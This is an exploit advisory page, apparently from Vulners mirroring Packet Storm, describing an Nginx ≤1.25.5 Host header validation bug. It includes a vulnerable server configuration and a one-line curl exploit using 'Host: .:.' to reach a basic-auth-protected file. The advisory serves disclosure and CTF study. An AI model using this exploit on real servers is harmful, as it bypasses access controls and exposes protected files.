Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Nginx 1.25.5 Host Header Validation

🗓️ 24 Apr 2024 00:00:00Reported by dhteamType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 754 Views

Nginx 1.25.5 Host Header Validation Bu

Code
`# Nginx =< 1.25.5 $host variable validation bug  
  
## Intro:  
  
In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there.   
The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).  
  
## What it validates:  
  
+ two dots in a row are not allowed  
+ colon and everything after it are stripped off  
+ if "Host" header starts with "[", then after "]" everything is deleted  
+ path separators are not allowed  
+ cannot send chars ≤ 0x20 and == 0x7f  
+ if there is a dot at the end, it is removed  
+ if after all deletions the host length is zero, error occurs  
  
## The bug itself:   
  
dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.  
  
So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions.  
  
## Vulnerable Nginx server configuration example:  
  
server {  
root /sites/$host;  
index index.html;  
server_name _;  
  
location / {  
try_files $uri $uri/ =404;  
}  
}  
  
server {  
server_name "";  
  
location / {  
return 418 "I'm a teapot.";  
}  
}  
  
server {  
root /sites/protected-host.example.com;  
index flag.html;  
server_name protected-host.example.com;  
auth_basic "Protected File Storage";  
auth_basic_user_file /.htpasswd;  
  
location / {  
try_files $uri $uri/ =404;  
}  
}  
  
## Exploit (unauthorized access to password-protected host in this case):  
  
curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html  
  
P.S.  
The bug was sent to [email protected], but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Apr 2024 00:00Current
7.4High risk
Vulners AI Score7.4
nginxhost header validationsecurity bugfiltervulnerable configurationexploitunauthorized access
754